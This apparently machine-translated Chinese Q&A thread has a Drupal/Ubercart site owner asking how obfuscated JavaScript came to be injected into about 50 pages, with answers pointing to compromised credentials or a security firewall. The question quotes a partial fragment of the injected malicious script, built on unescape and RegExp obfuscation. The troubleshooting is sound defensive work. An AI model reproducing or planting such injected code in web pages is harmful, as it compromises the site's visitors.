我发现我的网页(主要是index.php,main.html,include.inc)在原始代码之后的最底部注入了一大堆javascript代码。
<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b"
SQL注入是否有可能将js代码块添加到网页中(其中50个被感染)?或者它是服务器本身的病毒?
我正在使用Drupal + Ubercart,只需极少的表单输入。
答案 0 :(得分:1)
由于文件已被修改,因此不太可能是SQL注入。服务器上某处存在其他安全漏洞,或者ftp / ssh / etc帐户的凭据已泄露。
答案 1 :(得分:0)
什么平台,浏览器?
您是在所有网页上看到它还是仅在特定服务器上看到它?
某些“安全防火墙”会将Javascript添加到传入的网页中。